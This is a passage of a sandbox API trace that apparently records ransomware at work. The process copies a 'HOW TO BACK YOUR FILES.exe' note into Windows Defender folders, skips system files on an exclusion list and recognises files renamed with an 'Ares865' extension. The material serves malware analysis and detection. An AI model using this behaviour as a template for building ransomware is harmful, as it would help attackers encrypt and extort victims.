0x2e7b28 [0090.195] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xf2) returned 0x2c8eb8 [0090.195] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0090.195] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x63b2f180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63b2f180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", cAlternateFileName="{D2B0B~1")) returned 0 [0090.195] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.195] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b30 [0090.195] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}" [0090.195] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0090.195] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0090.195] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned 120 [0090.195] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}" [0090.195] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.195] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.195] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.196] GetLastError () returned 0x0 [0090.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.196] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.196] CloseHandle (hObject=0x120) returned 1 [0090.196] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.196] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.196] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x63b2f180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63b2f180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.196] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.196] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.196] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.196] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x63b2f180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63b2f180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.196] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.196] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.196] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.196] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.196] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c504f60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.196] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.196] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fd91f9, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fd91f9, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x637c31e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xb17490, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mpasbase.vdm.Ares865", cAlternateFileName="")) returned 1 [0090.196] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.196] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="aoldtz.exe") returned 1 [0090.196] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2=".") returned 1 [0090.196] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="..") returned 1 [0090.197] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="windows") returned -1 [0090.197] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="bootmgr") returned 1 [0090.197] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="temp") returned -1 [0090.197] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="pagefile.sys") returned -1 [0090.197] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="boot") returned 1 [0090.197] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="ids.txt") returned 1 [0090.197] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="ntuser.dat") returned -1 [0090.197] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="perflogs") returned -1 [0090.197] lstrcmpiW (lpString1="mpasbase.vdm.Ares865", lpString2="MSBuild") returned -1 [0090.197] lstrlenW (lpString="mpasbase.vdm.Ares865") returned 20 [0090.197] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\*") returned 122 [0090.197] lstrcpyW (in: lpString1=0x2cce4f2, lpString2="mpasbase.vdm.Ares865" | out: lpString1="mpasbase.vdm.Ares865") returned="mpasbase.vdm.Ares865" [0090.197] lstrlenW (lpString="mpasbase.vdm.Ares865") returned 20 [0090.197] lstrlenW (lpString="Ares865") returned 7 [0090.197] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.197] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fff35a, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x63b09020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x53090, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mpasdlta.vdm.Ares865", cAlternateFileName="")) returned 1 [0090.197] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.197] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="aoldtz.exe") returned 1 [0090.197] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2=".") returned 1 [0090.197] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="..") returned 1 [0090.197] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="windows") returned -1 [0090.197] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="bootmgr") returned 1 [0090.197] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="temp") returned -1 [0090.197] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="pagefile.sys") returned -1 [0090.197] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="boot") returned 1 [0090.197] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="ids.txt") returned 1 [0090.197] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="ntuser.dat") returned -1 [0090.197] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="perflogs") returned -1 [0090.197] lstrcmpiW (lpString1="mpasdlta.vdm.Ares865", lpString2="MSBuild") returned -1 [0090.197] lstrlenW (lpString="mpasdlta.vdm.Ares865") returned 20 [0090.197] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasbase.vdm.Ares865") returned 141 [0090.197] lstrcpyW (in: lpString1=0x2cce4f2, lpString2="mpasdlta.vdm.Ares865" | out: lpString1="mpasdlta.vdm.Ares865") returned="mpasdlta.vdm.Ares865" [0090.197] lstrlenW (lpString="mpasdlta.vdm.Ares865") returned 20 [0090.197] lstrlenW (lpString="Ares865") returned 7 [0090.197] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.197] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x63b552e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x7d2050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mpengine.dll.Ares865", cAlternateFileName="")) returned 1 [0090.197] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.198] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="aoldtz.exe") returned 1 [0090.198] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2=".") returned 1 [0090.198] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="..") returned 1 [0090.198] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="windows") returned -1 [0090.198] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="bootmgr") returned 1 [0090.198] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="temp") returned -1 [0090.198] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="pagefile.sys") returned -1 [0090.198] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="boot") returned 1 [0090.198] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="ids.txt") returned 1 [0090.198] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="ntuser.dat") returned -1 [0090.198] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="perflogs") returned -1 [0090.198] lstrcmpiW (lpString1="mpengine.dll.Ares865", lpString2="MSBuild") returned -1 [0090.198] lstrlenW (lpString="mpengine.dll.Ares865") returned 20 [0090.198] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.Ares865") returned 141 [0090.198] lstrcpyW (in: lpString1=0x2cce4f2, lpString2="mpengine.dll.Ares865" | out: lpString1="mpengine.dll.Ares865") returned="mpengine.dll.Ares865" [0090.198] lstrlenW (lpString="mpengine.dll.Ares865") returned 20 [0090.198] lstrlenW (lpString="Ares865") returned 7 [0090.198] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.198] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x63b552e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x7d2050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mpengine.dll.Ares865", cAlternateFileName="")) returned 0 [0090.198] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.198] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c10 [0090.198] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0090.198] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f3088 | out: hHeap=0x2b0000) returned 1 [0090.198] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0090.198] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned 89 [0090.198] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0090.198] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.198] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\definition updates\\updates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.199] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.199] GetLastError () returned 0x0 [0090.199] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.199] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.199] CloseHandle (hObject=0x120) returned 1 [0090.199] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.199] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.199] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c504f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.199] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.199] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.200] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.200] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c504f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.200] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.200] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.200] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.200] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.200] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c504f60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.200] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.200] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c504f60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.200] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.200] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c50 [0090.200] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0090.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0090.200] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0090.200] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned 88 [0090.200] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0090.200] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.200] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\windows defender\\definition updates\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.201] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.201] GetLastError () returned 0x0 [0090.201] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.201] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.201] CloseHandle (hObject=0x120) returned 1 [0090.201] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.201] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.201] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c504f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.201] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.201] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.201] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.201] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c504f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.201] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.201] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.201] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.201] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.201] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c504f60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.201] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.201] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c504f60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c504f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.202] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.202] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c70 [0090.202] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\VISIO", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\VISIO") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\VISIO" [0090.202] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e49b0 | out: hHeap=0x2b0000) returned 1 [0090.202] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0090.202] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\VISIO") returned 51 